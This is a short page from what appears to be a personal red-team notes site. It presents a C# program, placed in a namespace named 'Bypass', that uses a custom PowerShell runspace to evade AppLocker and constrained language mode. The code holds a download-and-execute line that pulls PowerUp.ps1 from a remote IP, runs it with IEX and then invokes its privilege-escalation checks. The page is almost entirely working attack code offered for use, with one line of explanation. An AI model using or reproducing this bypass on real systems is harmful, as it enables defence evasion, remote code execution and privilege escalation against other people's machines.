😎
😎
😎
😎
Intruder
Twitter
Search…
About Shantanu Khandelwal
Reporting
Excel Sheet to Word Report by PowerShell
Ghostwriter - Add report type
Red Team
HTTPS C2 Done Right NGINX
Domain Front
GoLang
ShellCode Injection
PowerShell
Enable Restricted Admin using powershell and use mimikatz for RDP
Powershell Custom Runspace
Using Reflection for AMSI Bypass
Database
Dealing with the Errors
Setting Up OPENVAS in KALI 2020.3
Phishing
Connecting GoPhish with Office365
SharpLoginPrompt - Success and a Curious Case
Gophish MODs
Long Live DMARC - Email Spoof issues
Talks I Like
Talks Worth Checking Out
Powered By GitBook
Powershell Custom Runspace
Powershell runspace allows ways to run powershell in an applocker mode or where powershell is in constrained language mode.
1
using System;
2
using System.Management.Automation;
3
using System.Management.Automation.Runspaces;
4
namespace Bypass
5
{
6
class Program
7
{
8
static void Main(string[] args)
9
{
10
Runspace rs = RunspaceFactory.CreateRunspace();
11
rs.Open();
12
PowerShell ps = PowerShell.Create();
13
ps.Runspace = rs;
14
String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Tools\\test.txt";
15
cmd = "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.95/PowerUp.ps1') | IEX; Invoke-AllChecks | Out-File -FilePath C:\\Tools\\test.txt";
16
ps.AddScript(cmd);
17
ps.Invoke();
18
rs.Close();
19
​
20
}
21
}
22
}
Copied!
Previous
Enable Restricted Admin using powershell and use mimikatz for RDP
Next
Using Reflection for AMSI Bypass
Last modified 1yr ago
Copy link